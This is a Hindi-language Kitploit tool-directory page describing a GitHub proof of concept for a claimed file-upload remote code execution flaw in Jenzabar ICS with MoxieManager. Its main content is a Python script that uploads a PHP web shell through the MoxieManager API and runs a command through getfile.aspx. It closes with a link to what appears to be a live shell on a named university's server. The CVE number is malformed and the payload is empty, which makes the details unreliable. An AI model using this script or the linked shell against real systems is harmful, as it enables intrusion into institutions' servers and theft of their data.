Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ICS-MoxieManager-FileUpload-PoC — CVE-2026-30-03 9.8 (गंभीर) Jenzabar ICS + MoxieManager में संभावित RCE | Kitploit
उपकरण/GitHubGitHub/itsismarcos/ics-moxiemanager-fileupload-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubitsismarcos/ics-moxiemanager-fileupload-poc

ICS-MoxieManager-FileUpload-PoC

CVE-2026-30-03 9.8 (गंभीर) Jenzabar ICS + MoxieManager में संभावित RCE

रिपॉजिटरी देखें
1116 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ICS-MoxieManager-RCE-CVE-2026-30-03

CVE-2026-30-03 9.8 (गंभीर) संभावित RCE Jenzabar ICS + MoxieManager

proff https://www.youtube.com/watch?v=lcfUL6Xx3f4&feature=youtu.be

CVE CVSS प्रभाव प्रभावित CVE-2026-30-03 9.8 (गंभीर) संभावित RCE Jenzabar ICS + MoxieManager

Jenzabar ICS प्रणाली द्वारा उपयोग किए जाने वाले MoxieManager घटक में एक भेद्यता फ़ाइलों के अनुचित अपलोड की अनुमति दे सकती है, जो कुछ शर्तों के तहत सार्वजनिक रूप से एक्सेस की जा सकती हैं और संभावित रूप से रिमोट कोड निष्पादन (RCE) की ओर ले जा सकती हैं। तकनीकी विवरण

समस्या निम्न कारणों से उत्पन्न होती है:

अपलोड की गई फ़ाइलों का उचित सत्यापन न होना

सार्वजनिक एंडपॉइंट के माध्यम से फ़ाइलों का संभावित एक्सपोज़र:

/ICS/staticpages/getfile.aspx

एंडपॉइंट पर असंगत प्रमाणीकरण नियंत्रण:

/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx

विशिष्ट परिदृश्यों में, अपलोड की गई फ़ाइलें सुलभ निर्देशिकाओं में संग्रहीत की जा सकती हैं और बाद में पुनर्प्राप्त की जा सकती हैं।

प्रभाव फ़ाइलों का मनमाना अपलोड संवेदनशील सामग्री का एक्सपोज़र संभावित रिमोट कोड निष्पादन (सर्वर कॉन्फ़िगरेशन पर निर्भर) सिस्टम का पूर्ण समझौता

वर्गीकरण CVSS v3.1: 9.8 (गंभीर) वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-434: बिना प्रतिबंध के फ़ाइल अपलोड CWE-284: अनुचित एक्सेस नियंत्रण

PoC एक्सप्लॉइट

#!/usr/bin/env python3

CVE-2026-30-03 PoC - ICS MoxieManager RCE

import requests

TARGET = "https://example.edu" MOXIE = f"{TARGET}/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx" UUID = "5d6b24cb-7bfe-4a6b-8581-4426bf0f4101"

1. Upload PHP Shell

files = {'file': ('shell.php', '', 'application/x-php')} data = {'action': 'upload', 'path': '/1085255', 'csrf': 'E24607903E4DC7496732F267BAD48FF35D855DA9E362AB80E0340D5B5EC5F164'}

r = requests.post(MOXIE, files=files, data=data) print(f"[+] Upload: {r.status_code}")

2. Execute

SHELL = f"{TARGET}/ICS/staticpages/getfile.aspx?target=/moxiemanager/files/users/{UUID}/shell.php" print(f"[+] Shell: {SHELL}?cmd=whoami") print(requests.get(f"{SHELL}?cmd=whoami").text)

प्रभावित सिस्टम (33+ पुष्टि)

उपचार तत्काल (शमन):

  1. DELETE /moxiemanager/files/users/*/shell.php

  2. getfile.aspx को प्रतिबंधित करें:

  3. RewriteRule ^/ICS/staticpages/getfile.aspx?target=.*shell.php - [F,L]

  4. MoxieManager अपलोड अक्षम करें

Prof https://my.rsu.edu/ICS/icsfs/shell.asp?target=61d75719-3a6a-4908-bb5d-3f9a443dd443

टूल डाउनलोड करें